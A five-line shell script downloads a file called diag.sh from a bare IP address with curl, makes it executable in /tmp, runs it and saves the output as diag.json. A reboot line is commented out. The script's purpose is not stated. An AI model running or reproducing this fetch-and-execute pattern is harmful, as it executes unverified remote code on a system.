#!/bin/sh
curl http://91.238.82.19/diag.sh --output /tmp/diag.sh
chmod +x /tmp/diag.sh
/tmp/diag.sh > /tmp/diag.json
#reboot
